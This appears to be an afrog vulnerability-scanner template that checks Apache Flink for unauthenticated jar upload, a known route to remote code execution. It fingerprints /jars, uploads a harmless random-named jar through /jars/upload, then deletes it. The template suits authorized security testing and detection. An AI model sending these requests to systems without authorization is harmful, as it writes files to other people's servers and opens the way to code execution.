pocs/afrog-pocs/e-vulnerability/apache-flink-upload-rce.yaml
1 | | - | id: apache-flink-upload-rce |
2 | | - | |
3 | | - | info: |
4 | | - | name: apache-flink-upload-rce |
5 | | - | author: timwhite |
6 | | - | severity: critical |
7 | | - | description: apache-flink-upload-rce |
8 | | - | reference: |
9 | | - | - https://github.com/LandGrey/flink-unauth-rce |
10 | | - | |
11 | | - | set: |
12 | | - | r1: randomLowercase(8) |
13 | | - | r2: randomLowercase(4) |
14 | | - | rules: |
15 | | - | r0: |
16 | | - | request: |
17 | | - | method: GET |
18 | | - | path: /jars |
19 | | - | follow_redirects: true |
20 | | - | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"address") && response.body.bcontains(b"files") |
21 | | - | r1: |
22 | | - | request: |
23 | | - | method: POST |
24 | | - | path: /jars/upload |
25 | | - | headers: |
26 | | - | Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 |
27 | | - | body: "\ |
28 | | - | --8ce4b16b22b58894aa86c421e8759df3\r\n\ |
29 | | - | Content-Disposition: form-data; name=\"jarfile\";filename=\"{{r2}}.jar\"\r\n\ |
30 | | - | Content-Type:application/octet-stream\r\n\ |
31 | | - | \r\n\ |
32 | | - | {{r1}}\r\n\ |
33 | | - | --8ce4b16b22b58894aa86c421e8759df3--\r\n\ |
34 | | - | " |
35 | | - | follow_redirects: true |
36 | | - | expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"success") && response.body.bcontains(bytes(r2)) |
37 | | - | output: |
38 | | - | search: '"(?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))".bsubmatch(response.body)' |
39 | | - | filen: search["filen"] |
40 | | - | r2: |
41 | | - | request: |
42 | | - | method: DELETE |
43 | | - | path: /jars/{{filen}} |
44 | | - | follow_redirects: true |
45 | | - | expression: response.status == 200 |
46 | | - | expression: r0() && r1() && r2() |